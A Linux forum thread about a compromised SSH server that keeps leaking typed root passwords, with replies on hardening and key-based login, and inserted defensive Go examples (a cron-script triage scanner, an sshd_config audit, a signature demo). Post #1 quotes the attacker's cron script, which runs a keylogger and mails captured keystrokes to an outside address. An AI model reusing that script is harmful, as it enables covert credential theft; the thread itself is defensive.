  1. #1
    Just Joined!
    Join Date
    Sep 2008
    Posts
    3

    ssh server compromised


    I am facing a weird situation. Every time I ssh to my linux box, it automatically sends the root password to fackgames@gmail.com. Besides this I get an unusual cron under /etc/cron.daily. Its name is dnsquery. Here is the content:

    #!/bin/sh
    cd /usr/lib/
    ./popauth -r httpd.log > test
    mkdir /usr/share/misc/
    mkdir /usr/share/misc/blah/
    cat /usr/share/misc/blah/temp.log |uniq >> test
    echo >/usr/share/misc/blah/temp.log
    mail fackgames@gmail.com -s "$(hostname -f)" < test
    rm -rf test httpd.log
    A=$PATH
    killall -9 popauth
    export PATH=/usr/lib/
    popauth -w httpd.log &
    export PATH=$A

    I have formatted the box and reinstalled, but face the same. I have tried uninstalling openssh and installing it again. It goes ok for a few days; after that, the same. Any clue?
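    A triage check for the kind of cron job described in this post, added here as an example and not part of the thread: it scans a script for the traits of the posted dnsquery job (mail to an outside address tagged with the hostname, PATH rewriting, a process restarted in the background, removal of its own files). The sample script is constructed with a placeholder recipient, and the indicator list is an assumption about what an incident responder would flag, not something taken from the page.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// indicators are the traits of the dnsquery job posted above: mail to an outside
// address tagged with the hostname, PATH rewriting, a background restart, self-cleanup.
var indicators = []struct {
	re     *regexp.Regexp
	reason string
}{
	{regexp.MustCompile(`\bmail\b.*@`), "mails data to an address"},
	{regexp.MustCompile(`\$\(hostname`), "tags outgoing mail with the hostname"},
	{regexp.MustCompile(`export PATH=`), "rewrites PATH"},
	{regexp.MustCompile(`killall\s+-9`), "force-kills a process"},
	{regexp.MustCompile(`&\s*$`), "backgrounds a process from cron"},
	{regexp.MustCompile(`\brm -rf\b`), "removes files"},
}

// TriageScript returns "line N: reason" for each indicator hit, in line order; benign jobs yield nothing.
func TriageScript(script string) []string {
	var out []string
	for i, line := range strings.Split(script, "\n") {
		for _, ind := range indicators {
			if ind.re.MatchString(line) {
				out = append(out, fmt.Sprintf("line %d: %s", i+1, ind.reason))
			}
		}
	}
	return out
}

// sample is a constructed script with the shape of the posted one; the recipient
// is a placeholder, not the address from the thread.
const sample = `#!/bin/sh
mail attacker@example.invalid -s "$(hostname -f)" < test
rm -rf test httpd.log
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A
`
func main() {
	for _, f := range TriageScript(sample) {
		fmt.Println("dnsquery:", f)
	}
}
```

    Run it over every file in /etc/cron.d, /etc/cron.daily and the per-user crontabs; a daily job that hits several of these at once is worth pulling for analysis before the box is rebuilt.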

  2. #2
    Super Moderator Roxoff's Avatar
    Join Date
    Aug 2005
    Location
    Nottingham, England
    Posts
    3,930
    How can it send the root password to an email address? Linux doesn't store the root password in a form that can be read; it's hashed.

    My recommendation is to disconnect from the network, re-install, and take the following precautions:

    - use a new username for yourself and use a strong password, don't re-use your user home directory, use a new one and copy in any data files you want (i.e. don't re-use any desktop or system settings for the new user)
    - turn on the firewall and ensure it's locked down
    - install root-kit detection software
    - only ever log in as a regular user
    - turn off ssh logins as the root user, and put ssh on a different port
    - make sure SELinux is installed and turned on, read up on how it works and what you can do with it.
    - Only then plug in to the internet, and run your updates
    - thank your lucky stars you're using Linux, you'd have had no idea you were compromised on the major commercial operating system
    Linux user #126863 - see http://linuxcounter.net/

  3. #3
    Just Joined!
    Join Date
    Sep 2008
    Posts
    3
    Roxoff, thanks for your mail. Actually it doesn't mail the root password from /etc/shadow or the password file. When I log in and type my root password, it copies the keystrokes and sends the mail. If I log in as a normal user and sudo to root, it also mails the password.

    I removed openssh and reinstalled it again. It is ok now. But I need a clue: how does it happen?

  5. #4
    Linux Engineer GNU-Fan's Avatar
    Join Date
    Mar 2008
    Posts
    935
    Please tell us the specific distribution/version you were using. The loophole does not necessarily have to be in SSH.
    Debian GNU/Linux -- You know you want it.

  6. #5
    Just Joined!
    Join Date
    Sep 2008
    Posts
    3
    I face the same problem on Fedora 8 and CentOS 5.

  7. #6
    Linux Engineer Freston's Avatar
    Join Date
    Mar 2007
    Location
    The Netherlands
    Posts
    1,049
    Can you find out where the attacker is coming from? Maybe he left traces in your logs.

    That way you can determine how he comes in, which may lead to knowing where your system is vulnerable. I think this is important because if multiple reinstalls don't shut this attacker out, then either you have an attacker with a particular interest in your box or you have an oversight in your security policy. Neither need be of a technical nature.

    It requires some skill and a lot of knowledge to install a key logger on the root account of a foreign machine. Roxoff gave some excellent advice on how to counter this. But for safety's sake I'd delve into monitoring too. Keep a close eye on the logs, and maybe even automate this.
    Can't tell an OS by it's GUI

  8. #7
    Linux Enthusiast meton_magis's Avatar
    Join Date
    Oct 2006
    Location
    arizona
    Posts
    699
    If you want to be REALLY secure (I'm quite paranoid, and err on the side of caution) create an SSH key for your NON-root user, with a password, and do everything else that was listed above. In addition, shut off all forms of authentication except for keypair. Then, even if they capture your password with a keylogger device, they still need your private key (don't store it on your PC, keep it on a flash drive, with a backup somewhere).

    NOTE: I'm pretty sure that your private key is never transmitted in a way that even a hacker with control over your box could sniff it. I THINK that you just send data that was signed, that your public key can verify. I'm not 100% sure how it works, but I think that is it.
    New to the internet, technical forums, or the hacker / open source community??
    Read this to learn good posting habits http://www.catb.org/~esr/faqs/smart-questions.html

    RHCE for RHEL version 5
    RHCT for RHEL version 4
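    An audit of sshd_config against the ssh items in Roxoff's list (post #2: no root logins, a non-default port) and meton_magis's key-only advice (post #7: passwords off), added here as an example and not part of the thread. The two config snippets are constructed, and the defaults assumed for keywords the file leaves unset are those OpenSSH shipped with at the time (PermitRootLogin yes, Port 22, PasswordAuthentication yes).

```go
package main

import (
	"fmt"
	"strings"
)

// Requirements drawn from the thread: no root logins and a non-default port
// (post #2), passwords off so only key pairs authenticate (post #7). def is
// the OpenSSH default of that era, used when the file leaves the keyword unset.
var checks = []struct {
	key, def, why string
	ok            func(v string) bool
}{
	{"permitrootlogin", "yes", "root must not log in over ssh", func(v string) bool { return v == "no" }},
	{"port", "22", "move sshd off the default port", func(v string) bool { return v != "22" }},
	{"passwordauthentication", "yes", "keys only, so a keylogged password is useless", func(v string) bool { return v == "no" }},
}
// Audit returns one line per failed requirement (empty slice: hardened). Like
// sshd it keeps the first value of a keyword, ignores case and skips comments.
func Audit(cfg string) []string {
	vals := map[string]string{}
	for _, line := range strings.Split(cfg, "\n") {
		f := strings.Fields(line) // "Keyword value" form only, not "Keyword=value"
		if len(f) < 2 || strings.HasPrefix(f[0], "#") {
			continue
		}
		if k := strings.ToLower(f[0]); vals[k] == "" {
			vals[k] = f[1]
		}
	}
	var fails []string
	for _, c := range checks {
		v := vals[c.key]
		if v == "" {
			v = c.def
		}
		if !c.ok(v) {
			fails = append(fails, c.key+"="+v+": "+c.why)
		}
	}
	return fails
}
// Constructed inputs: a stock-looking config (root login left at its default) and a hardened one.
const weak = "# sshd_config\nPort 22\n#PermitRootLogin yes\nPasswordAuthentication yes\n"
const hardened = "Port 2222\nPermitRootLogin no\nPasswordAuthentication no\nPubkeyAuthentication yes\n"
func main() {
	fmt.Println("weak:", Audit(weak))
	fmt.Println("hardened:", Audit(hardened))
}
```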

  9. #8
    Super Moderator Roxoff's Avatar
    Join Date
    Aug 2005
    Location
    Nottingham, England
    Posts
    3,930
    Quote Originally Posted by meton_magis View Post
    If you want to be REALLY secure (I'm quite paranoid, and err on the side of caution) create an SSH key for your NON-root user, with a password, and do everything else that was listed above. In addition, shut off all forms of authentication except for keypair. Then, even if they capture your password with a keylogger device, they still need your private key (don't store it on your PC, keep it on a flash drive, with a backup somewhere).
    This is the way smart card logon is handled; but the authentication key is stored on a smart card which it never comes off of. To unencrypt with the private key on the card, your system sends the data to the card which unencrypts it.

    Quote Originally Posted by meton_magis View Post
    NOTE: I'm pretty sure that your private key is never transmitted in a way that even a hacker with control over your box could sniff it. I THINK that you just send data that was signed, that your public key can verify. I'm not 100% sure how it works, but I think that is it.
    You are right: if someone captures your public key and your password, they're still unlikely to be able to get in; they can brute-force attack a key, but with 1024 bit or (even better) 2048 bit encryption keys, you can make cracking the numbers statistically impossible within the cracker's (or your) lifetime.

    Of course, with physical access to your machine, they can still be in within a few seconds.
    Linux user #126863 - see http://linuxcounter.net/
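    What posts #7 and #8 describe, as an added example that is not from the thread: a public-key login reduced to a challenge signed with the private key, so only a signature ever crosses the wire and a captured one is useless in a later session. It uses Go's crypto/ed25519 with a random per-session value as a simplified stand-in for the SSH session identifier (real SSH signs more than that), so it is a model of the idea, not the OpenSSH protocol.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"fmt"
)

// Server is the sshd side of a public-key login, reduced to its essentials: it
// stores only the public key (authorized_keys) and a fresh per-session value.
// The private key never reaches it, which is the point made in posts #7 and #8.
type Server struct {
	authorized ed25519.PublicKey
	sessionID  []byte // constructed stand-in for the SSH session identifier
}

func NewServer(pub ed25519.PublicKey) *Server {
	s := &Server{authorized: pub, sessionID: make([]byte, 32)}
	if _, err := rand.Read(s.sessionID); err != nil {
		panic(err)
	}
	return s
}

// Challenge is what the server sends to the client.
func (s *Server) Challenge() []byte { return append([]byte(nil), s.sessionID...) }

// Verify accepts the login only if the signature over this session's
// challenge checks out under the authorized public key.
func (s *Server) Verify(sig []byte) bool { return ed25519.Verify(s.authorized, s.sessionID, sig) }

// ClientSign is the client side: the private key stays local, only the signature goes back.
func ClientSign(priv ed25519.PrivateKey, challenge []byte) []byte { return ed25519.Sign(priv, challenge) }

// Scenario runs a legitimate login, then an eavesdropper who captured the public
// key, challenge and signature replays that signature in a new session and fails.
func Scenario() (legit, replay bool) {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	s1 := NewServer(pub)
	sig := ClientSign(priv, s1.Challenge())
	legit = s1.Verify(sig)
	s2 := NewServer(pub) // later session: same authorized key, fresh challenge
	replay = s2.Verify(sig)
	return legit, replay
}

func main() {
	legit, replay := Scenario()
	fmt.Printf("legitimate login accepted: %v, replayed signature accepted: %v\n", legit, replay)
}
```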

  10. #9
    Linux Enthusiast meton_magis's Avatar
    Join Date
    Oct 2006
    Location
    arizona
    Posts
    699
    Of course, with physical access to your machine, they can still be in within a few seconds.

    Which is always fun to do. I had to crack my own system in a linux class after someone reset my root password, and put a ciphered password on my GRUB menu. Luckily I didn't have to open the case and jump the CMOS; all I had to do was whip out a RHEL recovery disk, and remove the GRUB password.
    New to the internet, technical forums, or the hacker / open source community??
    Read this to learn good posting habits http://www.catb.org/~esr/faqs/smart-questions.html

    RHCE for RHEL version 5
    RHCT for RHEL version 4
